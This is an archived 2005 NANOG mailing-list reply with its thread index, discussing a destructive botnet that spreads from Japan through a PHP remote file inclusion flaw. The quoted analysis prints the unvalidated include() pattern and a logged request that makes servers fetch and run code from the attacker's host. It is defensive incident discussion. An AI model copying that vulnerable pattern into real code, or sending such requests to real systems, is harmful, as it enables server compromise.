You'd think nsp-sec people would try and get nsp-jp involved. Oh, there is no nsp-jp, or skooter 15. :)
-----Original Message-----
From: Barrett G. Lyon [mailto:[EMAIL PROTECTED]]
Sent: Fri Dec 23 19:21:47 2005
To: nanog@merit.edu
Subject: Re:Destructive botnet originating from Japan
Well it appears that bad code always seems to be the root of
problems, according to our research today the problem appears to be
caused by incorrectly written PHP applications that perform includes
using a string without running any validation against the string:
index.php?test=test
$test=$_GET[test];
include("$test.php");
When the include executes the test string passed from the GET
includes execution instructions:
"GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200
8010 "-" "Wget/1.6"
It appears that the attacker at 210.170.60.2 (also the botnet hosting
IRC server) is spreading his code as the include is called, pulling
and executing PHP code from a remote server that injects the software.
I'm not sure if this needs to be alerted to anyone outside of this
list, but it's pretty nasty.
-Barrett
Title: RE: Re:Destructive botnet originating from Japan
- RE: Re:Destructive botnet originating from Japan Hannigan, Martin
- Re:Destructive botnet originating from Japan Barrett G. Lyon
- Re:Destructive botnet originating from Japa... Rob Thomas
- Re:Destructive botnet originating from ... Gadi Evron
- Re: Destructive botnet originating ... Richard A Steenbergen
- Re: Destructive botnet origina... Gadi Evron
- Re:Destructive botnet originating from Japan chuck goolsbee
- Re: Destructive botnet originating from Japan Hannigan, Martin
- Re: Destructive botnet originating from Jap... Randy Bush
- Re: Destructive botnet originating from Jap... Rubens Kuhl Jr.